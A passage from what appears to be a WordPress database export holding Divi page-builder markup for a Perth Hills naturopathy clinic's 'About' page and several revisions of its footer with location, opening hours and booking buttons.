style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#c7d3c0\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9am-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2021-05-27 21:32:35','2021-05-27 13:32:35','',27,'https://verdenaturopathy.com.au/?p=264',0,'revision','',0),(175,1,'2021-05-26 14:55:52','2021-05-26 06:55:52','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. Mel also runs Verde Botanicals, offering small-batch, handmade herbal remedies to keep her creative juices flowing. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/IMG_3973-scaled.jpg\" title_text=\"IMG_3973\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/IMG_3912-scaled.jpg\" title_text=\"IMG_3912\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting or creating, you’ll most likely find her brewing a cuppa, chasing after her three children or wandering through the forest. </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"> </span></p>\n<p><span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Qualifications: </span></strong></span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Bachelor of Health Science (Naturopathy) </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Bachelor of Science (Biological Science) </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"> </span></p>\n<p><span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Australian Natural Therapist’s Association (ANTA) - Full member</span></p>\n<ul></ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" hover_enabled=\"0\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\" border_color_all=\"#000000\" border_style_all=\"none\" sticky_enabled=\"0\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#c7d3c0\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" button_text_color=\"#000000\" button_bg_enable_color=\"on\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; \">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; \">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat; \">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2021-05-26 14:55:52','2021-05-26 06:55:52','',27,'https://verde.desidrivers.com.au/?p=175',0,'revision','',0),(183,1,'2021-05-26 20:39:04','2021-05-26 12:03:55',' ','','','publish','closed','closed','','183','','','2021-05-26 20:39:04','2021-05-26 12:39:04','',0,'https://verde.desidrivers.com.au/?p=183',1,'nav_menu_item','',0),(184,1,'2021-05-26 20:39:04','2021-05-26 12:03:55',' ','','','publish','closed','closed','','184','','','2021-05-26 20:39:04','2021-05-26 12:39:04','',0,'https://verde.desidrivers.com.au/?p=184',2,'nav_menu_item','',0),(188,1,'2021-05-26 20:09:38','2021-05-26 12:09:38','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#e6e5e1\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" parallax=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" saved_tabs=\"all\" locked=\"off\" template_type=\"section\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#CCD4C8\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/</span><span style=\"font-family: Montserrat;\">Wed: 9am-4pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 11am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','clinic info','','publish','closed','closed','','clinic-info','','','2025-10-02 10:53:05','2025-10-02 02:53:05','',0,'https://verde.desidrivers.com.au/et_pb_layout/clinic-info/',0,'et_pb_layout','',0),(479,1,'2025-09-16 18:04:15','2025-09-16 10:04:15','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" parallax=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" hover_enabled=\"0\" saved_tabs=\"all\" locked=\"off\" background_color=\"#e6e5e1\" sticky_enabled=\"0\" template_type=\"section\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#CCD4C8\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','clinic info','','inherit','closed','closed','','188-revision-v1','','','2025-09-16 18:04:15','2025-09-16 10:04:15','',188,'https://verdenaturopathy.com.au/?p=479',0,'revision','',0),(192,1,'2021-05-26 20:13:28','2021-05-26 12:13:28','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" saved_tabs=\"all\" locked=\"off\" template_type=\"section\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#C7D3BA\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','clinic info','','inherit','closed','closed','','188-revision-v1','','','2021-05-26 20:13:28','2021-05-26 12:13:28','',188,'https://verde.desidrivers.com.au/?p=192',0,'revision','',0),(202,1,'2021-05-26 21:12:12','2021-05-26 13:12:12','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" 